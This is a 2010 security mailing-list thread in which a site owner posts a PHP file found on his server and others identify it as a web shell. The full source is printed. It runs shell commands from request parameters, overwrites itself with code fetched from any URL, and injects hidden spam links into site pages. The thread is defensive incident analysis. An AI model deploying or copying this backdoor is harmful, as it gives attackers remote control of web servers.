PaulDotCom mailing list archives
Odd PHP file, trying to find out what it does
From: bradmcmahon at gmail.com (Bradley McMahon)
Date: Mon, 1 Mar 2010 12:03:05 -0500
here is the function system. http://us.php.net/manual/en/function.system.php looks like it could be pretty nasty. -Brad On Mon, Mar 1, 2010 at 11:29 AM, Andrew Ellis <only.samurai at gmail.com> wrote:
This is pretty heavily obscured (obviously), but the structure and some of the things it's doing is reminiscent of PHP Shell, like C99. Code like: function Com() { ? ?if (isset($_POST['c'])) ? ? ?@system($_POST['c']); ?if (isset($_GET['c'])) ? ? ? ?@system($_GET['c']); } Is used to pass things through the web-page to the server, allowing the malicious user to control things more granularly. I copied all the code you posted to a server and ran it through php at the command line. If you add in something like $_POST['c'] = "ls > test.txt" to the top of the file and run it, you'll find no output on the page, but a nicely created test.txt file with the contents of the directory containing this script... Sad to say, looks like you were 0wned. On Mon, Mar 1, 2010 at 3:16 AM, Adrian Crenshaw <irongeek at irongeek.com> wrote:Ok, I think one of my sites may have been compromised. I found the following PHP script on a site, but I'm not sure what it is trying to do. Anyone else ever seen this script before? Adrian <?php ignore_user_abort(1); set_time_limit(0); function Clear() { ??? unlink("c"); ??? unlink("1r"); ? unlink("log"); } function Clear2() { ??? $mrd = trim(file_get_contents("m")); ??? $pt = "../$mrd"; ??? $fin = file_get_contents($pt); ??? $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); ? $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); ??? $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); ??? $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin); ??? $fin = ereg_replace("<!--dd4-->", "", $fin); ? $fin = ereg_replace("<!--dd5-->", "", $fin); ? $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin); ??? $fmrd = fopen($pt, "w+"); ??? fwrite($fmrd, $fin); ??? fclose($fmrd); ??? echo " upt-ok"; } function GetVar($name, &$var) { ??? $var = ""; ??? if (isset($_POST[$name])) ??? ??? $var = $_POST[$name]; ? if (isset($_GET[$name])) ??? ??? $var = $_GET[$name]; ??? if (($var) =="") ??? ? return? false; ??? ? else return true; } function Gen() { ??? $alp = "abcdefghiklmnjsweqrtyuiopzx"; ??? $maps = array(); ??? if (isset($_POST["sg"])) ??? ??? $sg = $_POST["sg"]; ? if (isset($_GET["sg"])) ??? ??? $sg = $_GET["sg"]; ??? if (isset($_POST["gm"])) ???? ?$g = $_POST["gm"]; ??? if (isset($_GET["gm"])) ??? ??? $g = $_GET["gm"]; ??? $path = ""; ??? $fr = fopen("1r", "a+"); ??? if (file_exists("c")) ??? { ??? ??? $fconf = file("c"); ??? ??? $tname = trim($fconf[0]); ??? ??? $cname = trim($fconf[1]); ??? ??? $curs = trim($fconf[2]); ??? ??? $pid = trim($fconf[3]); ??? ??? if ($pid == 100) ??? ??? { ??? ??? ??? $pid = 0; ??? ??? ??? $rnd = mt_rand(0, 999); ??? ??? ??? $nm = ""; ??? ??? for ($i=0; $i<3; $i++) ??? ? ??? { ??? ??? ? ??? $ran = mt_rand(0,26); ??? ??? ? ??? $sym = $alp[$ran]; ??? ??? ? ??? $nm = $nm.$sym; ??? ??? ? } ??? ??? ??? $cname = $nm; ??? ??? ??? mkdir("$tname/$cname"); ??? ??? ??? $curs = $g; ??? ??? } ??? } ??? else ??? { ??? ??? $rnd = mt_rand(0, 999); ??? ??? $nm = ""; ??? ? for ($i=0; $i<5; $i++) ??? ??? { ??? ??? ??? $ran = mt_rand(0,26); ??? ??? ??? $sym = $alp[$ran]; ??? ??? ??? $nm = $nm.$sym; ??? ??? } ??? ??? $tname = $nm; ??? ??? $pid = 0; ??? ??? $curs = $g; ??? ??? mkdir($tname); ??? ??? $fht = fopen("$tname/.htaccess", "w+"); ??? ??? $htname = $sg."2.txt"; ??? ??? $fp = fopen($htname, "r"); ??? ??? $fin = ''; ??? ??? while (!feof($fp)) ??? ??? { ??? ??? ??? ?$fc = fgets($fp, 1024); ??? ??? ??? ?if (!$fc) break; ??? ??? ?? $fin .= $fc; ??? ??? } ??? ??? fclose($fp); ??? ??? fwrite($fht, $fin); ??? ??? fclose($fht); ??? ??? $rnd = mt_rand(0, 999); ??? ??? $nm = ""; ??? for ($i=0; $i<3; $i++) ? ??? { ??? ? ??? $ran = mt_rand(0,26); ??? ? ??? $sym = $alp[$ran]; ??? ? ??? $nm = $nm.$sym; ??? ? } ??? ??? $cname = $nm; ??? mkdir("$tname/$cname"); ??? } ? $gname = $sg."sgen.php"; ??? for ($j=$pid; $j<$pid+10; $j++) ??? { ??? ??? $fp = fopen($gname."?g=$curs", "r"); ??? ??? $fin = ''; ??? ??? while (!feof($fp)) ??? ??? { ??? ??? ??? ?$fc = fgets($fp, 1024); ??? ??? ??? ?if (!$fc) break; ??? ??? ?? $fin .= $fc; ??? ??? } ??? ??? fclose($fp); ??? ??? $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+"); ??? ??? fwrite($fnd, $fin); ??? ??? fclose($fnd); ??? } ??? if ($j==100) ??? { ??? ? $fp = fopen($gname."?g=$curs&m=1", "r"); ??? ??? $fin = ''; ??? ??? while (!feof($fp)) ??? ??? { ??? ??? ??? ?$fc = fgets($fp, 1024); ??? ??? ??? ?if (!$fc) break; ??? ??? ?? $fin .= $fc; ??? ??? } ??? ??? fclose($fp); ??? ??? $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+"); ??? ??? fwrite($fnd, $fin); ??? ??? fclose($fnd); ??? ??? $map = "$path/$tname/$cname/$curs"."_lm.htm"; ??? ??? fwrite($fr,"$map\n"); ??? } ??? $fconf = fopen("c", "w+"); ??? fwrite($fconf, $tname."\n"); ??? fwrite($fconf, $cname."\n"); ??? fwrite($fconf, $curs."\n"); ??? $nj = $j; ??? fwrite($fconf, $nj."\n"); ??? fclose($fconf); } function Update() { ??? $thisname = "1.php"; ??? if (isset($_POST['u'])) ??? ? $u = $_POST['u']; ??? if (isset($_GET['u'])) ???? ??? $u = $_GET['u']; ???? $fp = fopen($u, "r"); ? $fin = ''; ??? ??? while (!feof($fp)) ??? ??? { ??? ??? ??? ?$fc = fgets($fp, 1024); ??? ??? ??? ?if (!$fc) break; ??? ??? ?? $fin .= $fc; ??? ??? } ? fclose($fp); ? $fthis = fopen($thisname, "w+"); ? fwrite($fthis, $fin); ? fclose($fthis); } function Com() { ??? if (isset($_POST['c'])) ??? ? @system($_POST['c']); ? if (isset($_GET['c'])) ??? ??? @system($_GET['c']); } function UpKos() { ??? $mrd = trim(file_get_contents("m")); ??? $pt = "../$mrd"; ??? $fin = file_get_contents($pt); ??? $fin = ereg_replace("adsttnmq1", "<adsttnmq1>", $fin); ??? $fin = ereg_replace("sdioyslkjs2", "<sdioyslkjs2>", $fin); ??? $fmrd = fopen($pt, "w+"); ??? fwrite($fmrd, $fin); ??? fclose($fmrd); } function MRepl() { ??? $mpt = ""; ??? $drs = ""; ??? $begtag = "<adsttnmq1><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; ? $endtag = "</font></body></html><sdioyslkjs2> "; ??? $mrd = trim(file_get_contents("m")); ??? $pt = "../$mrd"; ??? $fin = file_get_contents($pt); ??? GetVar("mpt", $mpt); ??? ?// ??????? ??????????? ???? ???? ? $fin = preg_replace ("/<\/body>/i", "", $fin); ? $fin = preg_replace ("/<\/html>/i", "", $fin); ? $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); ? $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); ??? $fp = fopen($mpt, "r"); ? GetVar("drs", $drs); ? $fin = $fin.$begtag; $drs = str_replace("\\", "", $drs); ? $fin = $fin.$drs; ? $fin = $fin.$endtag; ? $fmrd = fopen($pt, "w+"); ??? fwrite($fmrd, $fin); ??? fclose($fmrd); } function Main() { ??? if (isset($_POST['u']) || isset($_GET['u'])) ??? { ??? ??? Update(); ??? ??? exit(); ??? } ??? if (isset($_POST['c']) || isset($_GET['c'])) ??? { ??? ??? Com(); ??? ??? exit(); ??? } ??? ??? if (isset($_POST['uk']) || isset($_GET['uk'])) ??? { ??? ??? UpKos(); ??? ??? exit(); ??? } ??? if (isset($_POST['g']) || isset($_GET['g'])) ??? { ??? ??? Gen(); ??? ??? exit(); ??? } ??? if (isset($_POST['s']) || isset($_GET['s'])) ??? { ??? ??? MRepl(); ??? ??? exit(); ??? } ? if (isset($_POST['cl']) || isset($_GET['cl'])) ??? { ??? ??? Clear(); ??? ??? exit(); ??? } ??? if (isset($_POST['cl2']) || isset($_GET['cl2'])) ??? { ??? ??? Clear2(); ??? ??? exit(); ??? } ??? echo "<ok>"; } Main(); ?> _______________________________________________ Pauldotcom mailing list Pauldotcom at mail.pauldotcom.com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com-- Andrew Ellis http://blog.psych0tik.net _______________________________________________ Pauldotcom mailing list Pauldotcom at mail.pauldotcom.com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
Current thread:
- Odd PHP file, trying to find out what it does Adrian Crenshaw (Mar 01)
- Odd PHP file, trying to find out what it does David Hoelzer (Mar 01)
- Odd PHP file, trying to find out what it does Andrew Ellis (Mar 01)
- Odd PHP file, trying to find out what it does Bradley McMahon (Mar 01)
- Odd PHP file, trying to find out what it does Dimitrios Kapsalis (Mar 01)
- Odd PHP file, trying to find out what it does Jim Halfpenny (Mar 01)
- Odd PHP file, trying to find out what it does Andrew Ellis (Mar 01)
- Odd PHP file, trying to find out what it does Adrian Crenshaw (Mar 01)
- Odd PHP file, trying to find out what it does Adrian Crenshaw (Mar 01)
- Odd PHP file, trying to find out what it does Adrian Crenshaw (Mar 01)
- Odd PHP file, trying to find out what it does Andrew Ellis (Mar 01)